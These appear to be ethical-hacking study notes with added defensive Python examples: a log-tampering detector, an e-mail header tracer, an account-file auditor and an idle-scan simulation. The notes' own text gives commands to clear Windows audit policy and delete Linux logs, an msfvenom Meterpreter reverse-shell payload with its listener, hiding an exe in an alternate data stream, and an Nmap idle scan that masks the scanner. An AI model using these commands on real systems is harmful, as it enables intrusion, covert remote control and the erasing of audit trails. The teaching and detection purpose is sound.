—Windows Auditing
To disable all auditing on a Windows machine we can use the command-line tool auditpol.exe:
auditpol.exe /clear
We can also delete logs on Linux:
rm /var/log/messages
Metasploit can also clear logs remotely
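The three log-tampering actions above each leave a trace of their own if auditing survives somewhere else (a forwarded Windows Security log, an auditd stream shipped off-host). The following detector, added here as an example and not part of the original notes, flags those traces over constructed records: the Windows event IDs 1102 (security log cleared), 104 (system log cleared) and 4719 (audit policy changed) are real, while the event dicts and auditd EXECVE lines are made up for the example.

```python
"""Flag log clearing and audit-policy changes in event records.

Added example (not from the notes); the Windows event IDs are real
(1102 = security log cleared, 104 = system log cleared, 4719 = audit
policy changed); the sample records below are constructed.
"""
import re

WINDOWS_TAMPER_EVENTS = {
    1102: "Security event log cleared",
    104: "System event log cleared",
    4719: "System audit policy changed (e.g. auditpol /clear)",
}

# Constructed Windows Security log records (dicts instead of real EVTX).
SAMPLE_WINDOWS_EVENTS = [
    {"event_id": 4624, "host": "ws01", "user": "alice",
     "message": "An account was successfully logged on."},
    {"event_id": 4719, "host": "ws01", "user": "alice",
     "message": "System audit policy was changed."},
    {"event_id": 1102, "host": "ws01", "user": "alice",
     "message": "The audit log was cleared."},
]

# Constructed Linux auditd EXECVE records (what 'rm /var/log/messages' leaves
# behind when execve calls are audited and shipped off the host).
SAMPLE_AUDITD_LINES = [
    'type=EXECVE msg=audit(1700000000.100:201): argc=3 a0="ls" a1="-la" a2="/var/log"',
    'type=EXECVE msg=audit(1700000000.200:202): argc=2 a0="rm" a1="/var/log/messages"',
    'type=EXECVE msg=audit(1700000000.300:203): argc=3 a0="rm" a1="-rf" a2="/var/log/audit"',
]

EXECVE_RE = re.compile(r"msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\).*?argc=\d+(?P<args>.*)$")
ARG_RE = re.compile(r'a\d+="([^"]*)"')
PROTECTED_LOG_PREFIXES = ("/var/log/",)
DESTRUCTIVE_COMMANDS = {"rm", "shred", "truncate", "unlink"}


def scan_windows_events(events):
    """Return one alert per event whose ID indicates log or audit-policy tampering."""
    alerts = []
    for ev in events:
        reason = WINDOWS_TAMPER_EVENTS.get(ev["event_id"])
        if reason:
            alerts.append({"source": "windows", "host": ev["host"], "user": ev["user"],
                           "event_id": ev["event_id"], "reason": reason})
    return alerts


def parse_execve(line):
    """Extract the audit serial and argv from one auditd EXECVE line, or None."""
    m = EXECVE_RE.search(line)
    if not m:
        return None
    return {"serial": int(m.group("serial")), "argv": ARG_RE.findall(m.group("args"))}


def scan_auditd_lines(lines):
    """Return one alert per EXECVE whose command deletes or empties a file under /var/log."""
    alerts = []
    for line in lines:
        rec = parse_execve(line)
        if not rec or not rec["argv"]:
            continue
        command = rec["argv"][0].rsplit("/", 1)[-1]  # strip a path prefix such as /bin/rm
        hit_paths = [a for a in rec["argv"][1:] if a.startswith(PROTECTED_LOG_PREFIXES)]
        if command in DESTRUCTIVE_COMMANDS and hit_paths:
            alerts.append({"source": "auditd", "serial": rec["serial"],
                           "command": " ".join(rec["argv"]),
                           "reason": f"{command} against log path(s): {', '.join(hit_paths)}"})
    return alerts


if __name__ == "__main__":
    for alert in scan_windows_events(SAMPLE_WINDOWS_EVENTS) + scan_auditd_lines(SAMPLE_AUDITD_LINES):
        print(alert)
```

The point of the example is that clearing a log is itself an event: the Windows check only works if 1102/4719 are forwarded before the local log is wiped, and the auditd check only works if the audit stream leaves the host, which is why a collector that receives logs in near real time is the mitigation for all three techniques.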
—msfvenom and sessions
Because many clients are behind a firewall, we need the client to initiate the session outbound to us.
By creating a payload exe file we can have the client open a session back to us and gain access to the computer.
Step 1. Make sure Metasploit is connected to the Postgres database:
db_status
service postgresql start
msf > msfdb init
- Create the attack file:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=1234 --format=exe > attack.exe
- Set Metasploit to listen on port 1234:
use exploit/multi/handler
set LHOST 192.168.1.1
set LPORT 1234
set payload windows/meterpreter/reverse_tcp
run
- Once attack.exe is executed on the client machine we can connect to the session.
—ADS (Alternate Data Streams)
We can hide one file inside another file's alternate data stream, so that when the file is opened an exe can run.
Step 1. Attach the exe to the txt file as an alternate data stream:
type calc.exe > C:\folder\textfile.txt:calc.exe
Step 2. Create an alias (symbolic link) that points at the stream:
mklink calc.exe C:\folder\textfile.txt:calc.exe
—Grey Hat Hacker
A reformed black hat hacker
—Hack Value
An item considered of high value to attack and exploit
—Netcraft
This is a website where you enter a URL and get back the OS type, services such as PHP, and a list of IP addresses.
—Pentesting Scenarios
Black Box = No Information is given about the system like ip hostname etc
Grey Box = Partial information is given like IP and Hostname
White Box = All Technical details are provided about the appliance or server
—Download a website
httrack downloads a website to your local computer.
—Web Data Extractor
Polls a website for sensitive information such as phone numbers, email addresses and even passwords.
—Email Tracker Pro
Analyses email headers to track down the sender's location and the SMTP relays the message passed through.
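What a header-analysis tool does under the hood is walk the Received: lines from the bottom (oldest) to the top (newest). The script below is an added example, not code from the notes or from Email Tracker Pro; it parses two constructed messages (RFC 5737 documentation addresses, made-up hostnames) with Python's standard email module, lists the relay hops in transit order, and checks the chain for the classic forgery sign: a hop whose "by" host is not the "from" host of the next hop.

```python
"""Walk the Received: chain of an e-mail to find the relays and originating IP.

Added example (not from the notes, not Email Tracker Pro's code); the
messages below are constructed with RFC 5737 documentation addresses.
"""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Constructed message: the sender at 192.0.2.77 handed it to relay.example.com,
# which passed it to mx.example.org, which delivered to inbox.example.net.
SAMPLE_RAW_EMAIL = """\
Received: from mx.example.org (mx.example.org [203.0.113.10])
    by inbox.example.net with ESMTP id abc123;
    Mon, 6 May 2024 10:02:05 +0000
Received: from relay.example.com (relay.example.com [198.51.100.25])
    by mx.example.org with ESMTPS id def456;
    Mon, 6 May 2024 10:02:01 +0000
Received: from [192.0.2.77] (unknown [192.0.2.77])
    by relay.example.com with ESMTPA id ghi789;
    Mon, 6 May 2024 10:01:58 +0000
From: sender@example.com
To: victim@example.net
Subject: test

body
"""

# Constructed message with a forged bottom hop: the sender wrote a fake
# Received: line so the mail looks as if it came through bigmail.example.
SAMPLE_FORGED_EMAIL = """\
Received: from [192.0.2.77] (unknown [192.0.2.77])
    by relay.example.com with ESMTPA id jkl012;
    Mon, 6 May 2024 11:00:03 +0000
Received: from innocent.example (innocent.example [203.0.113.99])
    by bigmail.example with ESMTP id zzz999;
    Mon, 6 May 2024 11:00:01 +0000
From: sender@example.com
To: victim@example.net
Subject: test

body
"""

FROM_RE = re.compile(r"\bfrom\s+(\S+)")
BY_RE = re.compile(r"\bby\s+(\S+)")
IP_RE = re.compile(r"\[([0-9a-fA-F.:]+)\]")


def parse_received(value):
    """Parse one (possibly folded) Received: header value into a hop dict."""
    value = " ".join(value.split())                 # unfold continuation lines
    from_m = FROM_RE.search(value)
    by_m = BY_RE.search(value)
    head = value[:by_m.start()] if by_m else value  # the IP belongs to the 'from' side
    ip_m = IP_RE.search(head)
    date_part = value.rsplit(";", 1)[1].strip() if ";" in value else ""
    try:
        when = parsedate_to_datetime(date_part) if date_part else None
    except (TypeError, ValueError):
        when = None
    return {"from": from_m.group(1) if from_m else None,
            "ip": ip_m.group(1) if ip_m else None,
            "by": by_m.group(1) if by_m else None,
            "time": when}


def trace_received_chain(raw_message):
    """Return hops in transit order (originating hop first, final delivery last)."""
    msg = message_from_string(raw_message)
    return [parse_received(v) for v in reversed(msg.get_all("Received", []))]


def originating_ip(raw_message):
    """IP of the lowest Received: line; only trustworthy if chain_inconsistencies() is empty."""
    hops = trace_received_chain(raw_message)
    return hops[0]["ip"] if hops else None


def chain_inconsistencies(hops):
    """Each hop's 'by' host should be the next hop's 'from' host, and time must not run backwards."""
    problems = []
    for i in range(len(hops) - 1):
        cur, nxt = hops[i], hops[i + 1]
        if cur["by"] != nxt["from"]:
            problems.append(f"hop {i}: handed to {cur['by']} but hop {i + 1} claims from {nxt['from']}")
        if cur["time"] and nxt["time"] and nxt["time"] < cur["time"]:
            problems.append(f"hop {i + 1}: timestamp earlier than hop {i}")
    return problems


if __name__ == "__main__":
    for raw in (SAMPLE_RAW_EMAIL, SAMPLE_FORGED_EMAIL):
        hops = trace_received_chain(raw)
        print(originating_ip(raw), chain_inconsistencies(hops))
```

Only the Received: lines added by your own and well-known upstream relays can be trusted; anything below the first hop you can vouch for was written by the sender, which is exactly what the consistency check on the forged sample catches.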
—metagoofil
Polls a website for sensitive information such as usernames, doc files and more.
—Linux
Usernames are stored in the following file:
/etc/passwd
Passwords are stored as hashes in the shadow file:
/etc/shadow
Groups are stored in the following file:
/etc/group
Security permissions
Read, write, execute (rwx) for each of User (rwx), Group (rwx) and Everyone (rwx). For example, to recursively give the owner rwx, the group r-x and everyone else nothing:
chmod -R 750 FOLDER
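The three files above are colon-separated and small enough to audit by hand, but a script makes the checks repeatable. The one below is an added example (not from the notes): it parses constructed /etc/passwd, /etc/shadow and /etc/group contents (placeholder hashes, made-up users) following the passwd(5)/shadow(5)/group(5) field layouts, reports the findings a reviewer looks for (a second UID 0 account, an unshadowed or empty password field, an empty shadow hash, an old md5crypt hash, privileged group membership) and decodes a numeric chmod mode such as 750 into rwx form.

```python
"""Audit constructed /etc/passwd, /etc/shadow and /etc/group contents and decode chmod modes.

Added example (not from the notes). The file contents are constructed and
the hashes are placeholders; field layouts follow passwd(5), shadow(5), group(5).
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
backdoor:x:0:0::/tmp:/bin/bash
legacy::1002:1002::/home/legacy:/bin/sh
"""

SAMPLE_SHADOW = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
alice:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19700:0:99999:7:::
bob:$1$PLACEHOLDERSALT$PLACEHOLDERHASH:19700:0:99999:7:::
backdoor:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:19700:0:99999:7:::
svc::19700:0:99999:7:::
"""

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice,backdoor
alice:x:1000:
"""

# $1$ is md5crypt; $5$, $6$ and $y$ are the modern sha256crypt, sha512crypt and yescrypt.
WEAK_HASH_PREFIXES = {"$1$": "md5crypt"}
PRIVILEGED_GROUPS = ("root", "sudo", "wheel")


def parse_colon_file(text, fields):
    """Split each non-empty line into a dict using the given field names."""
    return [dict(zip(fields, line.split(":"))) for line in text.splitlines() if line.strip()]


def parse_passwd(text):
    return parse_colon_file(text, ["name", "password", "uid", "gid", "gecos", "home", "shell"])


def parse_shadow(text):
    return parse_colon_file(text, ["name", "hash", "lastchg", "min", "max",
                                   "warn", "inactive", "expire", "reserved"])


def parse_group(text):
    rows = parse_colon_file(text, ["name", "password", "gid", "members"])
    for row in rows:
        row["members"] = [m for m in row["members"].split(",") if m]
    return rows


def audit_accounts(passwd_text, shadow_text, group_text):
    """Return human-readable findings for the three account files."""
    findings = []
    for u in parse_passwd(passwd_text):
        if u["uid"] == "0" and u["name"] != "root":
            findings.append(f"extra UID 0 account: {u['name']}")
        if u["password"] != "x":   # 'x' means the real hash lives in /etc/shadow
            kind = "empty" if not u["password"] else "hash in passwd"
            findings.append(f"password field not shadowed for {u['name']} ({kind})")
    for s in parse_shadow(shadow_text):
        if s["hash"] == "":
            findings.append(f"empty password hash (login without password): {s['name']}")
        for prefix, scheme in WEAK_HASH_PREFIXES.items():
            if s["hash"].startswith(prefix):
                findings.append(f"weak {scheme} hash for {s['name']}")
    for g in parse_group(group_text):
        if g["name"] in PRIVILEGED_GROUPS and g["members"]:
            findings.append(f"privileged group {g['name']} members: {', '.join(g['members'])}")
    return findings


def describe_mode(octal_mode):
    """'750' or 750 -> 'rwxr-x---' (user, group, everyone), as ls -l shows it."""
    bits = int(str(octal_mode), 8) & 0o777
    out = ""
    for shift in (6, 3, 0):            # user, group, everyone triples
        triple = (bits >> shift) & 0o7
        out += ("r" if triple & 4 else "-") + ("w" if triple & 2 else "-") + ("x" if triple & 1 else "-")
    return out


if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW, SAMPLE_GROUP):
        print(finding)
    print("750 ->", describe_mode("750"))
```

A locked or service account shows up in shadow with "*" or "!" in the hash field (daemon above), which is different from an empty field: the empty field is what lets someone log in with no password at all.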
—Idle Scan
Let's say you want to scan a list of ports on a host, but you don't want Nmap to scan it directly because you want to hide your own IP and avoid the IDS/IPS. The idle scan works like this, in sequence:
- A spoofed ACK is sent from a client (the idle "zombie") to the web server
- A SYN/ACK is sent back from the web server to the client
- A SYN/ACK is sent to the client from your attacking machine, taking note of the TCP SEQ number
- A RST is sent back from the client to the attacking machine. If the TCP SEQ is 1 higher, then no web server is present on that address. If the RST is +2 higher than the SYN/ACK, we know that the web server is listening and sent back a SYN/ACK
Nmap command to check all open ports on a host with idle scanning (192.168.1.216 is the zombie, 192.168.1.212 the target):
nmap -Pn -sI 192.168.1.216 -p 50-200 192.168.1.212
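The simulation below is an added example, not code from the notes or from Nmap, and it models the three parties of the exchange above in memory (no packets are sent). One detail it corrects: the counter the scanner reads from the zombie's RST is the IP ID field, not the TCP sequence number; on a truly idle host it increments by one per packet sent, which is what makes the +1/+2 rule work. The example also shows the two things a defender cares about: in the target's logs the probes appear to come from the zombie, and a zombie that is busy (or that randomizes its IP ID, as modern kernels do) makes the inference unreliable, so IP ID randomization is the mitigation that stops a host being used this way. Hosts, ports and IP ID values are constructed.

```python
"""Simulate the idle scan three-party exchange with a zombie's IP ID counter.

Added example (not from the notes, not Nmap's code). The notes describe the
counter as the TCP SEQ number; the value Nmap actually reads is the zombie's
IP ID, which on a truly idle host increments by one per packet sent.
Hosts, ports and IP IDs below are constructed; no packets are sent.
"""
import random

IPID_MODULUS = 65536


class Zombie:
    """The 'client' in the notes: answers unsolicited SYN/ACKs with a RST, ignores RSTs."""

    def __init__(self, background_packets=0, randomize_ipid=False, seed=0):
        self.ipid = 1000
        self.background_packets = background_packets  # other traffic between our probes
        self.randomize_ipid = randomize_ipid          # the OS-level mitigation
        self.rng = random.Random(seed)

    def _send(self):
        """Allocate the IP ID for one outgoing packet."""
        if self.randomize_ipid:
            self.ipid = self.rng.randrange(IPID_MODULUS)
        else:
            self.ipid = (self.ipid + 1) % IPID_MODULUS
        return self.ipid

    def receive(self, pkt):
        for _ in range(self.background_packets):  # a busy host keeps sending on its own
            self._send()
        if pkt["flags"] == "SYN/ACK":
            return {"src": "zombie", "dst": pkt["src"], "flags": "RST", "ipid": self._send()}
        return None  # a RST gets no reply, so no IP ID is consumed


class Target:
    """The web server: SYN/ACK for an open port, RST for a closed one."""

    def __init__(self, open_ports):
        self.open_ports = set(open_ports)

    def receive(self, pkt):
        if pkt["flags"] != "SYN":
            return None
        flags = "SYN/ACK" if pkt["port"] in self.open_ports else "RST"
        # Note the reply goes to pkt["src"], i.e. the zombie: that is what the target logs.
        return {"src": "target", "dst": pkt["src"], "flags": flags, "port": pkt["port"]}


def probe_zombie(zombie):
    """Attacker sends the zombie a SYN/ACK and reads the IP ID of the RST it returns."""
    reply = zombie.receive({"src": "attacker", "dst": "zombie", "flags": "SYN/ACK"})
    return reply["ipid"]


def idle_scan_port(zombie, target, port):
    before = probe_zombie(zombie)
    # Spoofed SYN carrying the zombie's address: the target answers the zombie, not us.
    reply = target.receive({"src": "zombie", "dst": "target", "flags": "SYN", "port": port})
    if reply is not None:
        zombie.receive(reply)  # SYN/ACK makes the zombie RST (one more ID); a RST is ignored
    after = probe_zombie(zombie)
    delta = (after - before) % IPID_MODULUS
    if delta == 1:
        return "closed"      # only our own probe consumed an ID
    if delta == 2:
        return "open"        # the target's SYN/ACK cost the zombie one extra packet
    return "unreliable"      # the zombie was not idle, or it randomizes its IP ID


def idle_scan(zombie, target, ports):
    return {port: idle_scan_port(zombie, target, port) for port in ports}


if __name__ == "__main__":
    print(idle_scan(Zombie(), Target({80, 443}), [22, 80, 443]))
    print(idle_scan(Zombie(background_packets=3), Target({80}), [80, 81]))
    print(idle_scan(Zombie(randomize_ipid=True), Target({80}), [80, 81]))
```

Running the busy-zombie and randomized-zombie cases shows why the technique needs a genuinely idle host with a predictable IP ID: every extra packet the zombie sends lands in the delta, and a random IP ID turns the delta into noise.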